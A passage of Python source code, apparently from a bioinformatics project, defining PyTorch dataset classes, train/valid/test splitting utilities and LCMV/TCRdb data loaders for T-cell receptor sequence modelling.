def all_labels(self) -> Sequence[bool]:
"""Return all labels"""
return self.labels
def __len__(self) -> int:
return len(self.tcrs)
def get_ith_tcr(self, idx: int, pad: bool = True) -> str:
"""Returns the ith tcr sequence, padded with null residues"""
retval = self.tcrs[idx]
if pad:
retval = ft.pad_or_trunc_sequence(retval, self.max_len, right_align=False)
return retval
def get_ith_sequence(self, idx: int) -> str:
return self.tcrs[idx]
def get_ith_label(self, idx: int) -> np.ndarray:
retval = float(self.labels[idx])
if not self.idx_encode_labels:
retval = np.array([1.0 - retval, retval], dtype=np.float32)
return np.atleast_1d(retval)
def __getitem__(self, idx: int) -> Tuple[Dict[str, torch.Tensor], torch.Tensor]:
tcr_idx = ft.idx_encode(self.get_ith_tcr(idx, pad=True))
label = self.get_ith_label(idx)
return (
{"seq": torch.from_numpy(tcr_idx)},
torch.from_numpy(label).type(torch.long).squeeze(),
)
class TcrSelfSupervisedDataset(TcrABSupervisedIdxDataset):
"""
Mostly for compatibility with transformers library
LineByLineTextDataset returns a dict of "input_ids" -> input_ids
"""
# Reference: https://github.com/huggingface/transformers/blob/447808c85f0e6d6b0aeeb07214942bf1e578f9d2/src/transformers/data/datasets/language_modeling.py
def __init__(self, tcr_seqs: Iterable[str], tokenizer, round_len: bool = True):
self.tcr_seqs = utils.dedup(tcr_seqs)
logging.info(
f"Creating self supervised dataset with {len(self.tcr_seqs)} sequences"
)
self.max_len = max([len(s) for s in self.tcr_seqs])
logging.info(f"Maximum sequence length: {self.max_len}")
if round_len:
self.max_len = int(utils.min_power_greater_than(self.max_len, 2))
logging.info(f"Rounded maximum length to {self.max_len}")
self.tokenizer = tokenizer
self._has_logged_example = False
def __len__(self) -> int:
return len(self.tcr_seqs)
def __getitem__(self, i: int) -> Dict[str, torch.Tensor]:
tcr = self.tcr_seqs[i]
retval = self.tokenizer.encode(ft.insert_whitespace(tcr))
if not self._has_logged_example:
logging.info(f"Example of tokenized input: {tcr} -> {retval}")
self._has_logged_example = True
return {"input_ids": torch.tensor(retval, dtype=torch.long)}
def merge(self, other):
"""Merge this dataset with the other dataset"""
all_tcrs = utils.dedup(self.tcr_seqs + other.tcr_seqs)
logging.info(
f"Merged two self-supervised datasets of sizes {len(self)} {len(other)} for dataset of {len(all_tcrs)}"
)
return TcrSelfSupervisedDataset(all_tcrs)
class TcrNextSentenceDataset(Dataset):
"""
Dataset for next sentence prediction. Input is two lists of pairwise
corresponding TRA TRB sequences
Note that the labelling scheme here is (False, True)
This DIFFERS from the convention used in the transformers library for NSP
Note that TRA/TRB naming convention is somewhat of a minomoer - in reality, these are
just first/second pairs.
This also supports generating NEGATIVE examples dynamically. This is automatically
enabled when this is wrapped in a DatasetSplit object with training split. This
may yield improved sampling of the negative manifold and yield a more general model
"""
def __init__(
self,
tra_seqs: List[str],
trb_seqs: List[str],
neg_ratio: float = 1.0,
labels: Optional[Iterable[bool]] = None,
tra_blacklist: Optional[Iterable[str]] = None,
mlm: float = 0.0,
max_len: int = 64,
seed: int = 4242,
remove_null: bool = True,
shuffle: bool = True,
):
assert len(tra_seqs) == len(trb_seqs)
# Remove cases of nan
logging.info(f"Build NSP dataset with {len(tra_seqs)} pairs")
if remove_null:
bad_idx_a = [
i
for i, seq in enumerate(tra_seqs)
if seq is None or pd.isnull(seq) or seq == ""
]
bad_idx_b = [
i
for i, seq in enumerate(trb_seqs)
if seq is None or pd.isnull(seq) or seq == ""
]
bad_idx = set(bad_idx_a).union(bad_idx_b)
logging.info(
f"Removing {len(bad_idx)} bad pairs: {len(bad_idx_a)} union {len(bad_idx_b)}"
)
tra_seqs = [a for i, a in enumerate(tra_seqs) if i not in bad_idx]
trb_seqs = [a for i, a in enumerate(trb_seqs) if i not in bad_idx]
if tra_blacklist is not None:
bad_idx = [i for i, seq in enumerate(tra_seqs) if seq in set(tra_blacklist)]
logging.info(f"Removing {len(bad_idx)} blacklisted items")
tra_seqs = [a for i, a in enumerate(tra_seqs) if i not in bad_idx]
trb_seqs = [a for i, a in enumerate(trb_seqs) if i not in bad_idx]
logging.info(f"Building NSP datset with {len(tra_seqs)} pairs after filtering")
# Insert whitespace as we store the sequences
# Whitespace separated inputs is expected by tokenizer
# These are never shuffled, regardless of the shuffle param
self.tra = [ft.insert_whitespace(aa) for aa in tra_seqs]
self.trb = [ft.insert_whitespace(aa) for aa in trb_seqs]
assert 0.0 <= mlm <= 1.0
self.mlm = mlm
self.neg_ratio = neg_ratio
self.rng = np.random.default_rng(seed=seed)
if self.neg_ratio > 0:
assert labels is None, "Cannot sample negatives if labels are given"
pos_pairs = list(zip(self.tra, self.trb))
num_negs = int(round(len(pos_pairs) * neg_ratio))
logging.info(f"Sampling {num_negs} negatives")
neg_pairs = [self.__sample_negative() for _i in range(num_negs)]
logging.info(f"Positive pairs: {len(pos_pairs)}")
logging.info(f"Sampled negative pairs: {len(neg_pairs)}")
# WARNING in tokenizers convention, output is (True, False)
# This means that a correct pair is a "0" and a wrong pair is a "1"
# we DO NOT adhere to this convention, rather using a conventional labelling
self.labels = np.array([1] * len(pos_pairs) + [0] * len(neg_pairs))
self.all_pairs = pos_pairs + neg_pairs
elif labels is not None:
logging.info(f"Taking given labels with {np.mean(labels)} positive rate")
self.labels = labels
self.all_pairs = list(zip(self.tra, self.trb))
else:
# raise RuntimeError("Must provide either neg_ratio or labels argument")
logging.warn(
"No labels or negative ratio provided, defaulting to all negative labels"
)
self.all_pairs = list(zip(self.tra, self.trb))
self.labels = np.array([0.0] * len(self.all_pairs))
assert len(self.labels) == len(self.all_pairs)
self.max_len = max_len
max_len_actual = max(
max([len(aa.split()) for aa in self.tra]),
max([len(aa.split()) for aa in self.trb]),
)
logging.info(f"Maximum length of NSP single sequence: {max_len_actual}")
self.tok = ft.get_aa_bert_tokenizer(max_len=max_len_actual)
# Shuffle the examples
if shuffle:
logging.info("Shuffling NSP dataset")
shuf_idx = np.arange(len(self.labels))
self.rng.shuffle(shuf_idx)
self.labels = self.labels[shuf_idx] # Contains whether this is a valid pair
self.all_pairs = [self.all_pairs[i] for i in shuf_idx]
logging.info(
f"NSP dataset of {len(self.all_pairs)} pairs, {np.sum(self.labels)} positive examples"
)
logging.info(f"Example training example")
for k, v in self[0].items():
logging.info(f"{k}: {v}")
def __sample_negative(self) -> Tuple[str, str]:
"""
Generate a negative example
"""
if self.neg_ratio <= 0.0:
raise RuntimeError("Cannot sample negatives for labelled dataset")
i, j = self.rng.integers(len(self.tra), size=2)
while self.tra[i] == self.tra[j]: # Is not a valid pair
j = self.rng.integers(len(self.tra))
return self.tra[i], self.trb[j]
def __len__(self) -> int:
assert len(self.labels) == len(self.all_pairs)
return len(self.labels)
def get_ith_label(self, idx):
return self.labels[idx]
def get_ith_sequence(self, idx) -> Tuple[str, str]:
return self.all_pairs[idx]
def __getitem__(self, idx: int, dynamic: bool = False) -> Dict[str, torch.Tensor]:
"""
dynamic is a general flag for generating examples dynamically
"""
label = self.labels[idx]
label_tensor = torch.LongTensor(np.atleast_1d(label))
if dynamic and label == 0:
# Dynamically generate a negative example
pair = self.__sample_negative()
else: # Positive example OR not dynamic
pair = self.all_pairs[idx]
if self.mlm > 0.0:
# Mask out each sequence BEFORE we pad/concatenate them
# This ensures that the mask is always an amino acid
mlm_targets, pair = zip(*[ft.mask_for_training(a) for a in pair])
t = np.atleast_1d(-100).astype(np.int64)
# CLS seq1 SEP seq2 SEP
mlm_targets_combined = np.concatenate(
[t, mlm_targets[0], t, mlm_targets[1], t]
)
mlm_targets_padded = torch.LongTensor(
np.pad(
mlm_targets_combined,
(0, self.max_len - len(mlm_targets_combined)),
mode="constant",
constant_values=-100,
)
)
enc = self.tok(
text=pair[0],
text_pair=pair[1],
padding="max_length",
max_length=self.max_len,
return_tensors="pt",
)
# Default tokenization has (batch, ...) as first dim
# Since __getitem__ only gets a single example, remove this
enc = {k: v.squeeze() for k, v in enc.items()}
if self.mlm > 0.0: # NSP + MLM
assert (
mlm_targets_padded.size() == enc["input_ids"].size()
), f"Mismatched sizes {mlm_targets_padded.size()} {enc['input_ids'].size()}"
enc["next_sentence_label"] = label_tensor
enc["labels"] = torch.LongTensor(mlm_targets_padded)
else: # NSP only
enc["labels"] = label_tensor
return enc
def get_all_items(self) -> Dict[str, torch.Tensor]:
"""
Get all the data instead of individual entries
"""
collector = collections.defaultdict(list)
for i in range(len(self)):
x = self[i]
for k, v in x.items():
collector[k].append(v.reshape(1, -1))
retval = {k: torch.cat(v, dim=0) for k, v in collector.items()}
return retval
class TcrFineTuneSingleDataset(TcrSelfSupervisedDataset):
"""Dataset for fine tuning from only TRA or TRB sequences"""
def __init__(
self,
aa: Sequence[str],
labels: MutableSequence[float],
label_continuous: bool = False,
label_labels: Optional[Sequence[str]] = None,
drop_rare_labels: bool = True,
):
assert len(aa) == len(
labels
), f"Got differing lengths for aa and labels: {len(aa)}, {len(labels)}"
self.aa = [ft.insert_whitespace(item) for item in aa]
self.tokenizer = ft.get_aa_bert_tokenizer(64)
self.continuous = label_continuous
label_dtype = np.float32 if self.continuous else np.int64
self.labels = np.array(labels, dtype=label_dtype).squeeze()
assert len(self.labels) == len(self.aa)
self.label_labels = label_labels
if self.continuous:
assert self.label_labels is None
if drop_rare_labels and not self.continuous and not self.is_multilabel:
# Get the mean positive rate for each label
labels_expanded = np.zeros((len(labels), np.max(labels) + 1))
labels_expanded[np.arange(len(labels)), self.labels] = 1
per_label_prop = np.mean(labels_expanded, axis=0)
# Find the labels with high enough positive rate
good_idx = np.where(per_label_prop >= 1e-3)[0]
if len(good_idx) < labels_expanded.shape[1]:
logging.info(
f"Retaining {len(good_idx)}/{labels_expanded.shape[1]} labels with sufficient examples"
)
# Reconstruct labels based only on retained good_idx
# nonzero returns indices of element that are nonzero
self.labels = np.array(
[
np.nonzero(good_idx == label)[0][0]
if label in good_idx
else len(good_idx) # "other" labels
for label in self.labels
],
dtype=label_dtype,
)
assert np.max(self.labels) == len(good_idx)
# Subset label labels
self.label_labels = [self.label_labels[i] for i in good_idx] + ["other"]
assert len(self.label_labels) == len(good_idx) + 1
@property
def is_multilabel(self) -> bool:
"""Return True if labels represent multilabel classification"""
return len(self.labels.shape) > 1
def get_ith_sequence(self, idx: int) -> str:
"""Get the ith sequence"""
return self.aa[idx]
def get_ith_label(self, idx: int) -> np.ndarray:
"""Gets the ith label"""
return np.atleast_1d(self.labels[idx])
def __len__(self) -> int:
return len(self.labels)
def __getitem__(self, idx: int) -> Dict[str, torch.Tensor]:
label = torch.tensor(self.get_ith_label(idx))
if self.is_multilabel:
# Multilabel -> BCEWithLogitsLoss which wants float target
label = label.float()
# We already inserted whitespaces in init
enc = self.tokenizer(
self.aa[idx], padding="max_length", max_length=64, return_tensors="pt"
)
enc = {k: v.squeeze() for k, v in enc.items()}
enc["labels"] = label
return enc
class TcrFineTuneDataset(TcrSelfSupervisedDataset):
"""Can supply tokenizer to work with ESM"""
def __init__(
self,
tcr_a_seqs: Sequence[str],
tcr_b_seqs: Sequence[str],
labels: Optional[np.ndarray] = None,
label_continuous: bool = False,
tokenizer: Optional[Callable] = None,
skorch_mode: bool = True,
idx_encode: bool = False,
):
assert len(tcr_a_seqs) == len(tcr_b_seqs)
self.tcr_a = list(tcr_a_seqs)
self.tcr_b = list(tcr_b_seqs)
self.max_len = max([len(s) for s in self.tcr_a + self.tcr_b]) + 2
if tokenizer is None:
tokenizer = ft.get_aa_bert_tokenizer(self.max_len)
self.tcr_a_tokenized = [
tokenizer.encode(
ft.insert_whitespace(aa),
padding="max_length",
max_length=self.max_len,
)
for aa in self.tcr_a
]
self.tcr_b_tokenized = [
tokenizer.encode(
ft.insert_whitespace(aa),
padding="max_length",
max_length=self.max_len,
)
for aa in self.tcr_b
]
else:
logging.info(f"Using pre-supplied tokenizer: {tokenizer}")
_label, _seq, self.tcr_a_tokenized = tokenizer(list(enumerate(self.tcr_a)))
_label, _seq, self.tcr_b_tokenized = tokenizer(list(enumerate(self.tcr_b)))
if labels is not None:
assert len(labels) == len(tcr_a_seqs)
self.labels = np.atleast_1d(labels.squeeze())
else:
logging.warning(
"Labels not given, defaulting to False labels (DO NOT USE FOR TRAINING)"
)
self.labels = None
self.continuous = label_continuous
self.skorch_mode = skorch_mode
self.idx_encode = idx_encode
def get_ith_sequence(self, idx: int) -> Tuple[str, str]:
"""Get the ith TRA/TRB pair"""
return self.tcr_a[idx], self.tcr_b[idx]
def get_ith_label(self, idx: int, idx_encode: Optional[bool] = None) -> np.ndarray:
"""Get the ith label"""
if self.labels is None:
return np.array([0]) # Dummy value
if not self.continuous:
label = self.labels[idx]
if not isinstance(label, np.ndarray):
label = np.atleast_1d(label)
if self.skorch_mode and len(label) == 1:
label = np.array([1.0 - label, label]).squeeze()
# Take given value if supplied, else default to self.idx_encode
idx_encode = self.idx_encode if idx_encode is None else idx_encode
if idx_encode:
label = np.where(label)[0]
return label
else:
# For the continuous case we simply return the ith value(s)
return self.labels[idx]
def __len__(self) -> int:
return len(self.tcr_a)
def __getitem__(
self, idx: int
) -> Union[Dict[str, torch.Tensor], Tuple[Dict[str, torch.Tensor], torch.Tensor]]:
label_dtype = torch.float if self.continuous else torch.long
tcr_a = self.tcr_a_tokenized[idx]
tcr_b = self.tcr_b_tokenized[idx]
label = self.get_ith_label(idx)
if not self.skorch_mode:
retval = {
"tcr_a": utils.ensure_tensor(tcr_a, dtype=torch.long),
"tcr_b": utils.ensure_tensor(tcr_b, dtype=torch.long),
"labels": utils.ensure_tensor(label, dtype=label_dtype),
}
else:
model_inputs = {
"tcr_a": utils.ensure_tensor(tcr_a, dtype=torch.long),
"tcr_b": utils.ensure_tensor(tcr_b, dtype=torch.long),
}
retval = (model_inputs, torch.tensor(label, dtype=label_dtype).squeeze())
return retval
class DatasetSplit(Dataset):
"""
Dataset split. Thin wrapper on top a dataset to provide data split functionality.
Can also enable dynamic example generation for train fold if supported by
the wrapped dataset (NOT for valid/test folds) via dynamic_training flag
kwargs are forwarded to shuffle_indices_train_valid_test
"""
def __init__(
self,
full_dataset: Dataset,
split: str,
dynamic_training: bool = False,
**kwargs,
):
self.dset = full_dataset
split_to_idx = {"train": 0, "valid": 1, "test": 2}
assert split in split_to_idx
self.split = split
self.dynamic = dynamic_training
if self.split != "train":
assert not self.dynamic, "Cannot have dynamic examples for valid/test"
self.idx = shuffle_indices_train_valid_test(
np.arange(len(self.dset)), **kwargs
)[split_to_idx[self.split]]
logging.info(f"Split {self.split} with {len(self)} examples")
def all_labels(self, **kwargs) -> np.ndarray:
"""Get all labels"""
if not hasattr(self.dset, "get_ith_label"):
raise NotImplementedError("Wrapped dataset must implement get_ith_label")
labels = [
self.dset.get_ith_label(self.idx[i], **kwargs) for i in range(len(self))
]
return np.stack(labels)
def all_sequences(self, **kwargs) -> Union[List[str], List[Tuple[str, str]]]:
"""Get all sequences"""
if not hasattr(self.dset, "get_ith_sequence"):
raise NotImplementedError(
f"Wrapped dataset {type(self.dset)} must implement get_ith_sequence"
)
# get_ith_sequence could return a str or a tuple of two str (TRA/TRB)
sequences = [
self.dset.get_ith_sequence(self.idx[i], **kwargs) for i in range(len(self))
]
return sequences
def to_file(self, fname: str, compress: bool = True) -> str:
"""
Write to the given file
"""
if not (
hasattr(self.dset, "get_ith_label")
and hasattr(self.dset, "get_ith_sequence")
):
raise NotImplementedError(
"Wrapped dataset must implement both get_ith_label & get_ith_sequence"
)
assert fname.endswith(".json")
all_examples = []
for idx in range(len(self)):
seq = self.dset.get_ith_sequence(self.idx[idx])
label_list = self.dset.get_ith_label(self.idx[idx]).tolist()
all_examples.append((seq, label_list))
with open(fname, "w") as sink:
json.dump(all_examples, sink, indent=4)
if compress:
with open(fname, "rb") as source:
with gzip.open(fname + ".gz", "wb") as sink:
shutil.copyfileobj(source, sink)
os.remove(fname)
fname += ".gz"
assert os.path.isfile(fname)
return os.path.abspath(fname)
def __len__(self) -> int:
return len(self.idx)
def __getitem__(self, idx: int):
if (
self.dynamic
and self.split == "train"
and "dynamic" in inspect.getfullargspec(self.dset.__getitem__).args
):
return self.dset.__getitem__(self.idx[idx], dynamic=True)
return self.dset.__getitem__(self.idx[idx])
class DatasetSplitByAttribute(DatasetSplit):
"""
Dataset split. Thin wrapper on top of a datset to provide data split functionality.
Unlike the above, which is a purely random split, this splits by a given attribute.
attr_getter function should take the dataset and return a list of attrs to split by
"""
def __init__(
self,
full_datset: Dataset,
attr_getter: Callable,
split: str,
dynamic_training: bool = False,
valid: float = 0.15,
test: float = 0.15,
seed: int = 1234,
):
self.dset = full_datset
self.dynamic = dynamic_training
self.split = split
self.split_attr = attr_getter(self.dset)
assert len(self.split_attr) == len(self.dset)
# Get the unique attrs and count occurrences of each
split_attr_counts = collections.Counter(self.split_attr)
assert (
len(split_attr_counts) >= 2
), f"Must have at least two classes of attribute to split, but got {len(split_attr_counts)}"
# Sort the attrs by most counts to least
_, self.train_attrs = zip(
*sorted(
[(count, attr) for attr, count in split_attr_counts.items()],
reverse=True,
)
)
self.train_attrs = list(self.train_attrs)
# Build valid, then test sets, by greedily taking the largest groups
# until we have at least the required number of examples
valid_n, test_n = len(self.dset) * valid, len(self.dset) * test
self.valid_attrs, self.test_attrs = [], []
while sum([split_attr_counts[a] for a in self.valid_attrs]) < valid_n:
# Take the biggest item in the list
self.valid_attrs.append(self.train_attrs.pop(0))
while sum([split_attr_counts[a] for a in self.test_attrs]) < test_n:
# Take the biggest item in the list
self.test_attrs.append(self.train_attrs.pop(0))
train_idx = np.array(
[
i
for i, attr in enumerate(self.split_attr)
if attr in set(self.train_attrs)
]
)
valid_idx = np.array(
[
i
for i, attr in enumerate(self.split_attr)
if attr in set(self.valid_attrs)
]
)
test_idx = np.array(
[
i
for i, attr in enumerate(self.split_attr)
if attr in set(self.test_attrs)
]
)
assert len(train_idx) + len(valid_idx) + len(test_idx) == len(self.dset)
logging.info(
f"Train split with {len(train_idx)} examples across {len(self.train_attrs)} attrs"
)
logging.info(
f"Valid split with {len(valid_idx)} examples across {len(self.valid_attrs)} attrs"
)
logging.info(
f"Test split with {len(test_idx)} examples across {len(self.test_attrs)} attrs"
)
rng = np.random.default_rng(seed)
rng.shuffle(train_idx)
rng.shuffle(valid_idx)
rng.shuffle(test_idx)
self.idx = {"train": train_idx, "valid": valid_idx, "test": test_idx}[split]
class DownsampledDataset(Dataset):
"""
Downsampled and shuffled dataset. Useful for evaluating impact of having less data.
Downsampling is done to a *fixed* subset of the original dataset
"""
def __init__(self, dset: Dataset, downsample: float = 0.1, seed: int = 3939):
assert 0.0 < downsample < 1.0
self.dset = dset
self.downsample = downsample
self.idx = np.arange(len(self.dset))
np.random.seed(seed)
np.random.shuffle(self.idx)
self.idx = self.idx[: int(np.round(downsample * len(self.dset)))]
logging.info(f"Downsampled from {len(self.dset)} -> {len(self)} samples")
def __len__(self) -> int:
return len(self.idx)
def __getitem__(self, idx: int):
return self.dset[self.idx[idx]]
def shuffle_indices_train_valid_test(
idx: np.ndarray, valid: float = 0.15, test: float = 0.15, seed: int = 1234
) -> Tuple[np.ndarray]:
"""
Given an array of indices, return indices partitioned into train, valid, and test indices
The following tests ensure that ordering is consistent across different calls
>>> np.all(shuffle_indices_train_valid_test(np.arange(100))[0] == shuffle_indices_train_valid_test(np.arange(100))[0])
True
>>> np.all(shuffle_indices_train_valid_test(np.arange(10000))[1] == shuffle_indices_train_valid_test(np.arange(10000))[1])
True
>>> np.all(shuffle_indices_train_valid_test(np.arange(20000))[2] == shuffle_indices_train_valid_test(np.arange(20000))[2])
True
>>> np.all(shuffle_indices_train_valid_test(np.arange(1000), 0.1, 0.1)[1] == shuffle_indices_train_valid_test(np.arange(1000), 0.1, 0.1)[1])
True
"""
np.random.seed(seed) # For reproducible subsampling
indices = np.copy(idx) # Make a copy because shuffling occurs in place
np.random.shuffle(indices) # Shuffles inplace
num_valid = int(round(len(indices) * valid)) if valid > 0 else 0
num_test = int(round(len(indices) * test)) if test > 0 else 0
num_train = len(indices) - num_valid - num_test
assert num_train > 0 and num_valid >= 0 and num_test >= 0
assert num_train + num_valid + num_test == len(
indices
), f"Got mismatched counts: {num_train} + {num_valid} + {num_test} != {len(indices)}"
indices_train = indices[:num_train]
indices_valid = indices[num_train : num_train + num_valid]
indices_test = indices[-num_test:]
assert indices_train.size + indices_valid.size + indices_test.size == len(idx)
return indices_train, indices_valid, indices_test
def split_arr(
arr: Union[np.ndarray, pd.DataFrame, list, tuple],
split: Literal["train", "valid", "test"],
**kwargs,
) -> Union[np.ndarray, pd.DataFrame, list]:
"""
Randomly split the array into the given split
kwargs are fed to shuffle_indices_train_valid_test
"""
split_to_idx = {"train": 0, "valid": 1, "test": 2}
assert split in split_to_idx, f"Unrecognized split: {split}"
n = len(arr) if isinstance(arr, (list, tuple)) else arr.shape[0]
indices = np.arange(n)
keep_idx = shuffle_indices_train_valid_test(indices, **kwargs)[split_to_idx[split]]
if isinstance(arr, pd.DataFrame):
return arr.iloc[keep_idx]
if isinstance(arr, (list, tuple)):
return [arr[i] for i in keep_idx]
return arr[keep_idx]
def sample_unlabelled_tcrdb_trb(
n: int, blacklist: Optional[Collection[str]] = None, seed: int = 6464
) -> List[str]:
"""
Convenience function to sample the given number of TRBs from TCRdb
Blacklist can be given to exclude certain sequences from sampling
The following tests ensure reproducibility
>>> all([a == b for a, b in zip(sample_unlabelled_tcrdb_trb(10), sample_unlabelled_tcrdb_trb(10))])
True
"""
tcrdb = load_tcrdb()
rng = np.random.default_rng(seed=seed)
if blacklist is None:
# Maintain separate code paths for back compatibility
idx = rng.choice(np.arange(len(tcrdb)), size=n, replace=False)
else:
# Removing whitespace has no effect if there was no whitespace to start
blacklist_set = set([ft.remove_whitespace(b) for b in blacklist])
# Oversample in case of overlap with blacklist
idx = rng.choice(np.arange(len(tcrdb)), size=n + len(blacklist), replace=False)
# Filter out blacklist overlaps and take the first n
idx = [i for i in idx if tcrdb.iloc[i]["AASeq"] not in blacklist_set][:n]
assert len(idx) == n
retval = [tcrdb.iloc[i]["AASeq"] for i in idx]
if blacklist: # No overlap
assert not set(retval).intersection(blacklist)
return retval
def load_lcmv_vdj(
vdj_fname: str = os.path.join(LOCAL_DATA_DIR, "lcmv_tcr_vdj_unsplit.txt.gz")
) -> Dict[str, Dict[str, Dict[str, Tuple[str, str, str]]]]:
"""
Load the vdj table and return it in a 3-level dictionary
identifier -> TRA/TRB -> cdr3 sequence -> (v, d, j)
{
tcr_cdr3s_aa_identifier : {
"TRA": {
cdr3_sequence: (v, d, j),
...
}
"TRB": ...
}
}
v d or j may be None if not provided
"""
check_none: Callable[
[str], Union[str, None]
] = lambda x: None if x.lower() == "none" or not x else x
df = pd.read_csv(vdj_fname, delimiter="\t", low_memory=False)
retval = collections.defaultdict(lambda: {"TRA": dict(), "TRB": dict()})
for i, row in df.iterrows():
k = row["tcr_cdr3s_aa"]
retval[k][row["chain"]][row["cdr3"]] = (
check_none(row["v_gene"]),
check_none(row["d_gene"]),
check_none(row["j_gene"]),
)
return retval
@functools.lru_cache(maxsize=16)
def load_lcmv_table(
fname: str = os.path.join(LOCAL_DATA_DIR, "lcmv_tetramer_tcr.txt"),
metadata_fname: str = os.path.join(LOCAL_DATA_DIR, "lcmv_all_metadata.txt.gz"),
vdj_fname: str = os.path.join(LOCAL_DATA_DIR, "lcmv_tcr_vdj_unsplit.txt.gz"),
drop_na: bool = True,
drop_unsorted: bool = True,
) -> pd.DataFrame:
"""Load the LCMV data table"""
table = pd.read_csv(fname, delimiter="\t")
logging.info(f"Loaded in table of {len(table)} entries")
if drop_na:
table.dropna(axis=0, how="any", subset=["tetramer", "TRB", "TRA"], inplace=True)
logging.info(f"{len(table)} entries remain after dropping na")
if drop_unsorted:
drop_idx = table.index[table["tetramer"] == "Unsorted"]
table.drop(index=drop_idx, inplace=True)
logging.info(f"{len(table)} entries remain after dropping unsorted")
# Take entires with multiple TRA or TRB sequences and split them, carrying over
# all of the other metadata to each row
dedup_rows = []
for _i, row in table.iterrows():
# For this row, determine nucleotide sequences
tcr_nt = collect_tra_trb(row["tcr_cdr3s_nt"])
# The nucleotide and the protein sequences should match up correctly
tcr_aa_combos = list(
itertools.product(row["TRA"].split(";"), row["TRB"].split(";"))
)
tcr_nt_combos = list(itertools.product(tcr_nt["TRA"], tcr_nt["TRB"]))
assert len(tcr_aa_combos) == len(tcr_nt_combos)
for ((tra_aa, trb_aa), (tra_nt, trb_nt)) in zip(tcr_aa_combos, tcr_nt_combos):
new_row = row.copy(deep=True)
# Check that nucleotide and protein sequences match up
assert utils.nt2aa(tra_nt) == tra_aa
assert utils.nt2aa(trb_nt) == trb_aa
new_row["TRA"] = tra_aa
new_row["TRB"] = trb_aa
new_row["TRA_nt"] = tra_nt
new_row["TRB_nt"] = trb_nt
dedup_rows.append(new_row)
dedup_table = pd.DataFrame(dedup_rows)
logging.info(f"{len(dedup_table)} entries after expanding multiple entries")
gp33_antigen = utils.read_newline_file(
os.path.join(os.path.dirname(fname), "lcmv_antigen.txt")
).pop()
dedup_table["antigen.sequence"] = gp33_antigen # gp33 tetramer
# Load metadata and match it up with prior table
metadata_df = pd.read_csv(metadata_fname, delimiter="\t", low_memory=False)
if drop_na:
metadata_df.dropna(axis=0, how="any", subset=["TRA", "TRB"], inplace=True)
table_ab_pairs = list(dedup_table["tcr_cdr3s_aa"])
metadata_ab_pairs = list(metadata_df["tcr_cdr3s_aa"])
idx_map = np.array([metadata_ab_pairs.index(p) for p in table_ab_pairs])
metadata_df_reorder = metadata_df.iloc[idx_map]
assert (
all(
[
i == j
for i, j in zip(
metadata_df_reorder["tcr_cdr3s_aa"], dedup_table["tcr_cdr3s_aa"]
)
]
)
and metadata_df_reorder.shape[0] == dedup_table.shape[0]
)
metadata_df_reorder = metadata_df_reorder.drop(
columns=[
col for col in metadata_df_reorder.columns if col in dedup_table.columns
]
)
metadata_df_reorder.index = dedup_table.index
# Load in VDJ annotations and match it up with prior table
vdj_mapping = load_lcmv_vdj(vdj_fname) # 3 layer dict
vdj_df_reorder_rows = []
for i, row in dedup_table.iterrows():
b_vdj = vdj_mapping[row["tcr_cdr3s_aa"]]["TRB"][row["TRB"]]
a_vdj = vdj_mapping[row["tcr_cdr3s_aa"]]["TRA"][row["TRA"]]
s = pd.Series(
[row["tcr_cdr3s_aa"], *a_vdj, *b_vdj],
index=[
"tcr_cdr3s_aa",
"v_a_gene",
"d_a_gene",
"j_a_gene",
"v_b_gene",
"d_b_gene",
"j_b_gene",
],
)
vdj_df_reorder_rows.append(s)
vdj_df_reorder = pd.DataFrame(vdj_df_reorder_rows)
assert all(
[
i == j
for i, j in zip(vdj_df_reorder["tcr_cdr3s_aa"], dedup_table["tcr_cdr3s_aa"])
]
)
vdj_df_drop_cols = [
col
for col in vdj_df_reorder.columns
if col in dedup_table.columns or col in metadata_df_reorder.columns
]
logging.debug(f"Dropping cols from VDJ info: {vdj_df_drop_cols}")
vdj_df_reorder = vdj_df_reorder.drop(columns=vdj_df_drop_cols)
vdj_df_reorder.index = dedup_table.index
retval = pd.concat([dedup_table, metadata_df_reorder, vdj_df_reorder], axis=1)
# Check that the TRA/TRB are the same as the "dedup_table" object that we were previously returning
assert all([i == j for i, j in zip(retval["TRA"], dedup_table["TRA"])])
assert all([i == j for i, j in zip(retval["TRB"], dedup_table["TRB"])])
# Report basic metadata
cnt = collections.Counter(dedup_table["tetramer"])
for k, v in cnt.items():
logging.info(f"Class {k}: {v}")
return retval
def dedup_lcmv_table(
lcmv_tab: pd.DataFrame,
blacklist_label_combos: Sequence[str] = (
"TetMid,TetNeg",
"TetNeg,TetPos",
"TetMid,TetNeg,TetPos",
),
return_mode: Literal["nt", "aa", "full"] = "aa",
) -> Tuple[Union[List[Tuple[str, str]], pd.DataFrame], List[str]]:
"""
Return TRA and TRB pairs that are deduped according to their AA sequence and removes
pairs with ambiguous labels
This was implemented to centrally solve the issue where the LCMV table had duplicate rows and
a few cases of ambiguous labels
Returns two items of equal length:
- List of (TRA, TRB) pairs either in AA form or NT form, or a subset of the full dataframe
- List of corresponding labels (may be merged)
"""
lcmv_ab = ["|".join(p) for p in zip(lcmv_tab["TRA"], lcmv_tab["TRB"])]
# Create a mapping from amino acid to NT sequence
lcmv_ab_to_nt = {
n: "|".join(p)
for n, p in zip(lcmv_ab, zip(lcmv_tab["TRA_nt"], lcmv_tab["TRB_nt"]))
}
lcmv_ab_to_full = {
"|".join([row["TRA"], row["TRB"]]): row for i, row in lcmv_tab.iterrows()
}
lcmv_ab_dedup, lcmv_labels_dedup = dedup_and_merge_labels(
lcmv_ab, list(lcmv_tab["tetramer"])
)
all_label_counter = collections.Counter(lcmv_labels_dedup)
logging.info(f"Combined labels {all_label_counter.most_common()}")
logging.info(f"Filtering out labels {blacklist_label_combos}")
good_label_idx = [
i for i, l in enumerate(lcmv_labels_dedup) if l not in blacklist_label_combos
]
logging.info(f"Retaining {len(good_label_idx)} pairs with unambiguous labels")
lcmv_ab_good = [lcmv_ab_dedup[i] for i in good_label_idx]
lcmv_labels_good = [lcmv_labels_dedup[i] for i in good_label_idx]
assert len(lcmv_ab_good) == len(lcmv_labels_good) == len(good_label_idx)
label_counter = collections.Counter(lcmv_labels_good)
logging.info(f"LCMV deduped labels: {label_counter.most_common()}")
# Resplit into pairs
if return_mode == "nt":
lcmv_ab_good_split = [tuple(lcmv_ab_to_nt[p].split("|")) for p in lcmv_ab_good]
elif return_mode == "aa":
lcmv_ab_good_split = [tuple(p.split("|")) for p in lcmv_ab_good]
elif return_mode == "full":
lcmv_ab_good_split = pd.DataFrame([lcmv_ab_to_full[p] for p in lcmv_ab_good])
else:
raise ValueError(f"Unrecognized return mode: {return_mode}")
return lcmv_ab_good_split, lcmv_labels_good
